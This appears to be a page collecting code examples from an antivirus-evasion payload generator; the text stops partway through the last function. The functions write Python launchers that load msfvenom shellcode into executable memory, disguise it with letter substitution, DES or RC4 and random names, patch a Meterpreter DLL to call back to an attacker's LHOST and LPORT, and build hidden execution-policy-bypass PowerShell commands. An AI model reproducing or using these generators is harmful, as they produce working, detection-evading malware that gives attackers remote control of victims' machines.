		powershell_command = blank_command
		powershell_command = base64.b64encode(powershell_command)
		
		# Text shown to the operator; the "x64" variant runs the 32-bit
		# PowerShell from syswow64 so the [IntPtr]/ToInt32 template fits.
		downloaderCode = "x86 powershell command:\n"
		downloaderCode += "\tpowershell -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command
		downloaderCode += "\n\nx64 powershell command:\n"
		downloaderCode += "\t%WinDir%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command + "\n"

		return downloaderCode
def pyvoidpointer():
    """Write a Python launcher to ./payload.py that calls the shellcode via a ctypes cast.

    The emitted script places the shellcode in a ctypes string buffer and
    casts it to a CFUNCTYPE -- no VirtualAlloc or protection change.
    Side effects only: overwrites payload.py in the current working
    directory, then calls supportfiles.supportingFiles() and
    messages.endmsg().  Returns None.
    """
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()

    # Generate Random Variable Names
    RandShellcode = randomizer.randomString()
    RandReverseShell = randomizer.randomString()
    RandMemoryShell = randomizer.randomString()

    # Create Payload File
    # Fixed file name in the cwd; IOError from open() is not handled.
    PayloadFile = open("payload.py", "w")
    PayloadFile.write("#!/usr/bin/python\n\n")
    PayloadFile.write("from ctypes import *\n\n")
    # Shellcode is expected to be "\x.." escape text inside a double-quoted literal.
    PayloadFile.write(RandReverseShell + ' = "' + Shellcode + '"\n')
    PayloadFile.write(
        RandMemoryShell + " = create_string_buffer(" + RandReverseShell + ", len(" + RandReverseShell + "))\n"
    )
    PayloadFile.write(RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n")
    PayloadFile.write(RandShellcode + "()")
    PayloadFile.close()

    # Create Supporting Files and Print Exit Message
    supportfiles.supportingFiles()
    messages.endmsg()
def pyLetterSubVAlloc():
    """Write a Python launcher to ./payload.py with a one-character substitution applied.

    The escaped shellcode text has every 'c' replaced by 't' before it is
    embedded; the emitted script swaps 't' back to 'c', un-escapes the text
    and runs the usual VirtualAlloc / RtlMoveMemory / CreateThread sequence.
    This is a trivial transform of the on-disk bytes, not encryption.

    Side effects only: overwrites payload.py in the current working
    directory, then calls supportfiles.supportingFiles() and
    messages.endmsg().  Python 2 code (string.maketrans, string_escape
    codec).  Returns None.
    """
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()

    # Generate Random Variable Names
    SubbedShellcodeVariableName = randomizer.randomString()
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    RandDecodedLetter = randomizer.randomString()
    RandCorrectLetter = randomizer.randomString()
    RandSubScheme = randomizer.randomString()

    # Letter Substitution Variables
    # The emitted script hard-codes the reverse mapping "t" -> "c" (below),
    # so these two values and those literals must stay in step.
    EncodeWithThis = "c"
    DecodeWithThis = "t"

    # Create Letter Substitution Scheme
    SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis)

    # Escaping Shellcode
    # Re-escapes so that the substitution operates on printable text.
    Shellcode = Shellcode.encode("string_escape")

    # Create Payload File
    # Fixed file name in the cwd; IOError from open() is not handled.
    PayloadFile = open('payload.py', 'w')
    PayloadFile.write('#!/usr/bin/python\n\n')
    PayloadFile.write('import ctypes\n')
    PayloadFile.write('from string import maketrans\n\n')
    PayloadFile.write(RandDecodedLetter + ' = "t"\n')
    PayloadFile.write(RandCorrectLetter + ' = "c"\n\n')
    PayloadFile.write(RandSubScheme + ' = maketrans('+ RandDecodedLetter +', '+ RandCorrectLetter + ')\n\n')
    # Substitution is applied here, at generation time, to the escaped text.
    PayloadFile.write(SubbedShellcodeVariableName + ' = \"'+ Shellcode.translate(SubScheme) +'\"\n\n')
    PayloadFile.write(SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n')
    PayloadFile.write(ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n\n')
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
    PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n')
    PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n')
    # Thread start address is the allocated buffer; c_int(-1) is INFINITE.
    PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n')
    PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))')
    PayloadFile.close()

    # Create Supporting Files and Print Exit Message
    supportfiles.supportingFiles()
    messages.endmsg()
	def generate(self):
		"""Return the source of a Python launcher with a one-character substitution applied.

		The escaped shellcode text has every 'c' replaced by 't' before it is
		embedded; the emitted script swaps 't' back to 'c', un-escapes the
		text and runs the usual VirtualAlloc / RtlMoveMemory / CreateThread
		sequence.  This only alters the on-disk bytes; it is not encryption.

		Side effect: (re)creates self.shellcode.  Reads self.required_options.
		Python 2 code (string.maketrans, string_escape codec).  Returns a str.
		"""
		
		# Generate Shellcode Using msfvenom
		self.shellcode = shellcode.Shellcode()
		Shellcode = self.shellcode.generate()
			
		# Generate Random Variable Names
		SubbedShellcodeVariableName = randomizer.randomString()
		ShellcodeVariableName = randomizer.randomString()
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()
		RandDecodedLetter = randomizer.randomString()
		RandCorrectLetter = randomizer.randomString()
		RandSubScheme = randomizer.randomString()

		# Letter Substitution Variables
		# The emitted script hard-codes the reverse mapping "t" -> "c" (below),
		# so these two values and those literals must stay in step.
		EncodeWithThis = "c"
		DecodeWithThis = "t"

		# Create Letter Substitution Scheme
		SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis)

		# Escaping Shellcode
		# Re-escapes so that the substitution operates on printable text.
		Shellcode = Shellcode.encode("string_escape")

		# Create Payload File
		# Everything appended below is text of the generated script.
		PayloadCode = 'import ctypes\n'
		PayloadCode += 'from string import maketrans\n'
		PayloadCode += RandDecodedLetter + ' = "t"\n'
		PayloadCode += RandCorrectLetter + ' = "c"\n'
		PayloadCode += RandSubScheme + ' = maketrans('+ RandDecodedLetter +', '+ RandCorrectLetter + ')\n'
		# Substitution is applied here, at generation time, to the escaped text.
		PayloadCode += SubbedShellcodeVariableName + ' = \"'+ Shellcode.translate(SubScheme) +'\"\n'
		PayloadCode += SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n'
		PayloadCode += ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n'
		# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
		# Thread start address is the allocated buffer; c_int(-1) is INFINITE.
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

		# Optionally wrap the finished launcher in the pyherion crypter.
		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)
			
		return PayloadCode
def pyDESVAlloc():
    """Write a Python loader stub to ``payload.py`` with the shellcode DES-encrypted.

    Python 2 only (``string_escape`` codec, ``str`` used as a byte string).
    Side effects: creates/overwrites ``payload.py`` in the working directory,
    then calls ``supportfiles.supportingFiles()`` and ``messages.endmsg()``.
    Returns None.

    NOTE(review): the key and IV are drawn from ``random`` (not a CSPRNG) and
    are written in clear text into the stub, so the DES layer is an
    encoding/obfuscation step, not confidentiality.
    """
    # Generate Shellcode Using msfvenom
    # presumably the escaped text form ("\x..") rather than raw bytes, since the
    # emitted stub string_escape-decodes it after decrypting — verify in shellcode.genShellcode
    Shellcode = shellcode.genShellcode()

    # Generate Random Variable Names (identifiers used inside the emitted stub)
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    ShellcodeVariableName = randomizer.randomString()
    RandIV = randomizer.randomString()
    RandDESKey = randomizer.randomString()
    RandDESPayload = randomizer.randomString()
    RandEncShellCodePayload = randomizer.randomString()

    # Set IV Value and DES Key
    # 8 characters each: the DES block size for the IV and an 8-byte key for DES.new
    iv = ''.join(random.choice(string.ascii_letters) for x in range(8))
    DESKey = ''.join(random.choice(string.ascii_letters + string.digits) for x in range(8))

    # Create DES Object and encrypt our payload
    # PyCrypto API; the CFB segment size is left at the library default, which the
    # stub's DES.new call (same arguments) must match
    desmain = DES.new(DESKey, DES.MODE_CFB, iv)
    EncShellCode = desmain.encrypt(Shellcode)

    # Create Payload File
    # NOTE(review): bare open()/close() — an exception in any write() below leaks the
    # handle and leaves a half-written payload.py; a `with` block would close it reliably.
    PayloadFile = open('payload.py', 'w')
    PayloadFile.write('#!/usr/bin/python\n\n')
    # the stub needs PyCrypto (Crypto.Cipher.DES) wherever it is executed
    PayloadFile.write('from Crypto.Cipher import DES\n')
    PayloadFile.write('import ctypes\n\n')
    PayloadFile.write(RandIV + ' = \'' + iv + '\'\n')
    PayloadFile.write(RandDESKey + ' = \'' + DESKey + '\'\n')
    PayloadFile.write(RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n\n')
    # ciphertext is embedded as an escaped string literal; Python's parser unescapes it on load
    PayloadFile.write(RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n\n')
    PayloadFile.write(ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n')
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
    PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
    PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n')
    PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n')
    PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n')
    # -1 == INFINITE: the stub blocks until the thread exits
    PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))')
    PayloadFile.close()

    # Create Supporting Files and Print Exit Message
    supportfiles.supportingFiles()
    messages.endmsg()
Example #19
	def generate(self):
		"""Return Python loader source (one string) with the shellcode DES-encrypted.

		Same stub as the file-writing variant elsewhere on this page, but built in
		memory and returned instead of written to disk.  Python 2 only
		(``string_escape`` codec).  Side effect: replaces ``self.shellcode`` with a
		fresh ``shellcode.Shellcode()`` before generating.  When
		``self.required_options["use_pyherion"]`` starts with "y" the result is
		passed through ``crypters.pyherion`` first.

		NOTE(review): key and IV come from ``randomizer.randomKey`` and are
		embedded in clear text in the stub, so DES here is encoding, not
		confidentiality.
		"""
		
		# Generate Shellcode Using msfvenom
		# presumably escaped text ("\x..") rather than raw bytes — the stub
		# string_escape-decodes it after decrypting; verify in Shellcode.generate
		self.shellcode = shellcode.Shellcode()
		Shellcode = self.shellcode.generate()
		
		# Generate Random Variable Names (identifiers used inside the emitted stub)
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()
		ShellcodeVariableName = randomizer.randomString()
		RandIV = randomizer.randomString()
		RandDESKey = randomizer.randomString()
		RandDESPayload = randomizer.randomString()
		RandEncShellCodePayload = randomizer.randomString()
		
		# Set IV Value and DES Key
		# 8 characters each: DES block size for the IV, 8-byte key for DES.new
		iv = randomizer.randomKey(8)
		DESKey = randomizer.randomKey(8)
		
		# Create DES Object and encrypt our payload
		# PyCrypto API; CFB segment size left at the library default, mirrored by the stub
		desmain = DES.new(DESKey, DES.MODE_CFB, iv)
		EncShellCode = desmain.encrypt(Shellcode)

		# Create Payload File
		# the stub needs PyCrypto (Crypto.Cipher.DES) wherever it is executed
		PayloadCode = 'from Crypto.Cipher import DES\n'
		PayloadCode += 'import ctypes\n'
		PayloadCode += RandIV + ' = \'' + iv + '\'\n'
		PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
		PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
		# ciphertext embedded as an escaped literal; Python's parser unescapes it on load
		PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
		PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
		# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		# -1 == INFINITE; note this last line carries no trailing newline, unlike the
		# sibling generators on this page (harmless for a final statement)
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))'
		
		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)
		
		return PayloadCode
Example #20
    def generate(self):
        """Return Python loader source for the generated shellcode, as one string.

        ``self.required_options["inject_method"]`` selects the stub: ``"virtual"``
        emits the VirtualAlloc/RtlMoveMemory/CreateThread sequence; any other
        value emits a ctypes ``create_string_buffer`` + ``cast`` call.  Either
        branch is wrapped by ``crypters.pyherion`` when ``use_pyherion`` starts
        with "y".  Python 2 only: the shellcode text is spliced into a ``str``
        literal as-is.

        NOTE(review): both branches repeat the shellcode generation and the
        pyherion check; only the stub text differs between them.
        """
        if self.required_options["inject_method"][0].lower() == "virtual":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
        
            # Generate Random Variable Names (identifiers used inside the emitted stub)
            ShellcodeVariableName = randomizer.randomString()
            RandPtr = randomizer.randomString()
            RandBuf = randomizer.randomString()
            RandHt = randomizer.randomString()
        
            # Create Payload code
            PayloadCode = 'import ctypes\n'
            # Shellcode is inserted verbatim inside a single-quoted literal, so it is
            # assumed to already be escaped text ("\x..") with no quote characters
            # — TODO confirm against self.shellcode.generate
            PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
            # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
            PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            # -1 == INFINITE: the stub blocks until the thread exits
            PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = crypters.pyherion(PayloadCode)

            return PayloadCode

        else:
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()

            # Generate Random Variable Names
            RandShellcode = randomizer.randomString()
            RandReverseShell = randomizer.randomString()
            RandMemoryShell = randomizer.randomString()
        
            PayloadCode = 'from ctypes import *\n'
            # same unescaped splice as above, here into a double-quoted literal
            PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n'
            # the stub casts a plain ctypes buffer to a function pointer; no
            # VirtualAlloc/VirtualProtect call is emitted, so this presumably
            # relies on the buffer's memory being executable — confirm
            PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
            PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            PayloadCode += RandShellcode + '()'
    
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = crypters.pyherion(PayloadCode)

            return PayloadCode
Example #21
    def generate(self):
        """Return Python source that embeds a patched metsrv DLL from METASPLOIT_PATH.

        Reads ``metsrv.x86.dll`` (falling back to ``metsrv.dll``) from
        ``settings.METASPLOIT_PATH``, overwrites fixed placeholders in it
        (header, user agent, transport string, handler URL built from
        ``LHOST``/``LPORT`` and ``self.genHTTPChecksum()``, two timeouts),
        compresses it with ``helpers.deflate`` and wraps it in a stub chosen by
        ``self.required_options["inject_method"]`` ("void" → ctypes ``cast``;
        anything else → VirtualAlloc/RtlMoveMemory/CreateThread).  The result is
        passed through ``crypters.pyherion`` when ``use_pyherion`` starts with "y".
        Python 2 only (``str`` used as bytes throughout).  Raises ``ValueError``
        (from ``str.index``) if any placeholder is absent from the DLL.
        """
        
        if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"):
            metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"
        else:
            metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
            
        # NOTE(review): bare open()/close() — a failing read() leaks the handle;
        # a `with` block would close it reliably.
        f = open(metsrvPath, 'rb')
        meterpreterDll = f.read()
        f.close()
        
        # lambda function used for patching the metsvc.dll
        # overwrites len(s) bytes in place at offset ind; there is no check that s fits
        # the placeholder it replaces, so an over-long s silently clobbers what follows
        dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]

        # patch the metsrv.dll header
        headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xb0"
        headerPatch += "\x0e\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
        headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
        meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)

        # patch in the default user agent string
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)

        # turn off SSL
        # the search string is 25 bytes but the replacement is 27, so two bytes past the
        # match are overwritten too — presumably padding in the placeholder; confirm
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTP\x00"
        meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)

        # replace the URL/port of the handler
        # the placeholder slot is 8 + 256 bytes; LHOST/LPORT are not length-checked here
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
        
        # replace the expiration timeout placeholder with 604800 (seconds, i.e. 7 days)
        expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
        expirationTimeout = struct.pack('<I', 604800)
        meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)

        # replace the communication timeout placeholder with 300
        communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
        communicationTimeout = struct.pack('<I', 300)
        meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)

        # compress/base64 encode the dll
        # the stub inflates with zlib.decompress(..., -15) (raw deflate), so
        # helpers.deflate is assumed to produce raw-deflate + base64 — verify
        compressedDll = helpers.deflate(meterpreterDll)
        
        # actually build out the payload
        payloadCode = ""
        
        # traditional void pointer injection
        if self.required_options["inject_method"][0].lower() == "void":

            # doing void * cast
            payloadCode += "from ctypes import *\nimport base64,zlib\n"

            randInflateFuncName = randomizer.randomString()
            randb64stringName = randomizer.randomString()
            randVarName = randomizer.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            # randVarName is deliberately re-drawn: the first value is only used inside the helper
            randVarName = randomizer.randomString()
            randFuncName = randomizer.randomString()
            
            payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
            # the stub casts a plain str object to a function pointer; no memory
            # protection call is emitted, so this presumably relies on that memory
            # being executable — confirm
            payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
            payloadCode += randFuncName+"()\n"

        # VirtualAlloc() injection
        else:

            payloadCode += 'import ctypes,base64,zlib\n'

            randInflateFuncName = randomizer.randomString()
            randb64stringName = randomizer.randomString()
            randVarName = randomizer.randomString()
            randPtr = randomizer.randomString()
            randBuf = randomizer.randomString()
            randHt = randomizer.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            # unlike the void branch, randVarName is reused here for the module-level
            # variable; it shadows the helper's local of the same name, which is harmless
            payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
            # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
            payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
            payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
            payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            # -1 == INFINITE: the stub blocks until the thread exits
            payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'

        
        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = crypters.pyherion(payloadCode)

        return payloadCode
Example #22
    def generate(self):
        """Return Python loader source with the shellcode RC4 (ARC4) encrypted.

        ``self.required_options["inject_method"]`` selects the stub: ``"virtual"``
        emits the VirtualAlloc/RtlMoveMemory/CreateThread sequence; any other
        value emits a ctypes ``create_string_buffer`` + ``cast`` call.  Both
        branches embed the key in clear text and are wrapped by
        ``crypters.pyherion`` when ``use_pyherion`` starts with "y".  Python 2
        only (``string_escape`` codec).

        NOTE(review): an ``iv`` is generated and written into the stub in both
        branches but never used — ``ARC4.new`` takes only the key.  The two
        branches also duplicate everything except the final stub lines.
        """
        if self.required_options["inject_method"][0].lower() == "virtual":

            # Generate Shellcode Using msfvenom
            # presumably escaped text ("\x..") — the stub string_escape-decodes
            # it after decrypting; verify in self.shellcode.generate
            Shellcode = self.shellcode.generate()

            # Generate Random Variable Names (identifiers used inside the emitted stub)
            RandPtr = randomizer.randomString()
            RandBuf = randomizer.randomString()
            RandHt = randomizer.randomString()
            ShellcodeVariableName = randomizer.randomString()
            RandIV = randomizer.randomString()
            RandARCKey = randomizer.randomString()
            RandARCPayload = randomizer.randomString()
            RandEncShellCodePayload = randomizer.randomString()

            # Set IV Value and ARC Key
            # iv is dead: RC4 is a stream cipher and takes no IV (see ARC4.new below)
            iv = randomizer.randomKey(8)
            # 8-character key from randomizer.randomKey; embedded in clear text in the stub
            ARCKey = randomizer.randomKey(8)

            # Create ARC4 Object and encrypt our payload (PyCrypto API)
            arc4main = ARC4.new(ARCKey)
            EncShellCode = arc4main.encrypt(Shellcode)

            # the stub needs PyCrypto (Crypto.Cipher.ARC4) wherever it is executed
            PayloadCode = 'from Crypto.Cipher import ARC4\n'
            PayloadCode += 'import ctypes\n'
            # unused in the stub as well; kept only because the stub text mirrors the DES variant
            PayloadCode += RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
            PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
            # ciphertext embedded as an escaped literal; Python's parser unescapes it on load
            PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
                "string_escape") + '\'\n'
            PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
            # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
            PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            # -1 == INFINITE: the stub blocks until the thread exits
            PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = crypters.pyherion(PayloadCode)

            return PayloadCode

        else:
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()

            # Generate Random Variable Names
            # RandPtr / RandBuf / RandHt are drawn but unused in this branch
            RandPtr = randomizer.randomString()
            RandBuf = randomizer.randomString()
            RandHt = randomizer.randomString()
            ShellcodeVariableName = randomizer.randomString()
            RandIV = randomizer.randomString()
            RandARCKey = randomizer.randomString()
            RandARCPayload = randomizer.randomString()
            RandEncShellCodePayload = randomizer.randomString()
            RandShellcode = randomizer.randomString()
            RandReverseShell = randomizer.randomString()
            RandMemoryShell = randomizer.randomString()

            # Set IV Value and ARC Key
            # iv is dead here too: ARC4.new takes only the key
            iv = randomizer.randomKey(8)
            ARCKey = randomizer.randomKey(8)

            # Create ARC4 Object and encrypt our payload (PyCrypto API)
            arc4main = ARC4.new(ARCKey)
            EncShellCode = arc4main.encrypt(Shellcode)

            PayloadCode = 'from Crypto.Cipher import ARC4\n'
            PayloadCode += 'from ctypes import *\n'
            PayloadCode += RandIV + ' = \'' + iv + '\'\n'
